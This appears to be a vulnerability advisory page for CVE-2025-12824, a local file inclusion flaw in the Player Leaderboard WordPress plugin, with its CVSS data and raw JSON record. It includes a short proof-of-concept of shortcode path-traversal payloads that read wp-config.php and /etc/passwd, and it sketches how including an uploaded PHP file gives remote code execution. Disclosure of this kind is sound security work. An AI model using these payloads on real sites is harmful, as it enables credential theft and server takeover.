Security Vulnerability Report
中文
CVE-2025-12824 CVSS 8.8 HIGH

CVE-2025-12824

Published: 2025-12-12 04:15:40
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Player Leaderboard plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.0.2 via the 'player_leaderboard' shortcode. This is due to the plugin using an unsanitized user-supplied value from the shortcode's 'mode' attribute in a call to include() without proper path validation. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve full remote code execution if combined with file upload capabilities.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Player Leaderboard插件 <= 1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12824 PoC - Player Leaderboard LFI # Requires Contributor+ level access # Basic LFI to read sensitive files [player_leaderboard mode="../../wp-config.php"] # Read /etc/passwd [player_leaderboard mode="../../../../../../etc/passwd"] # Path traversal to read wp-config.php [player_leaderboard mode="../../../../../../var/www/html/wp-config.php"] # Combined with file upload to achieve RCE: # 1. Upload a malicious PHP file via media upload or other vectors # 2. Include the uploaded file: [player_leaderboard mode="../../../../uploads/2025/malicious.php"]

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12824", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:39.953", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Player Leaderboard plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.0.2 via the 'player_leaderboard' shortcode. This is due to the plugin using an unsanitized user-supplied value from the shortcode's 'mode' attribute in a call to include() without proper path validation. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve full remote code execution if combined with file upload capabilities."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/player-leaderboard/trunk/public/class-player-leaderboard-public.php#L1419", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416129%40player-leaderboard&new=3416129%40player-leaderboard", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/527f8f08-bab3-4319-99bf-845c8b378c19?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.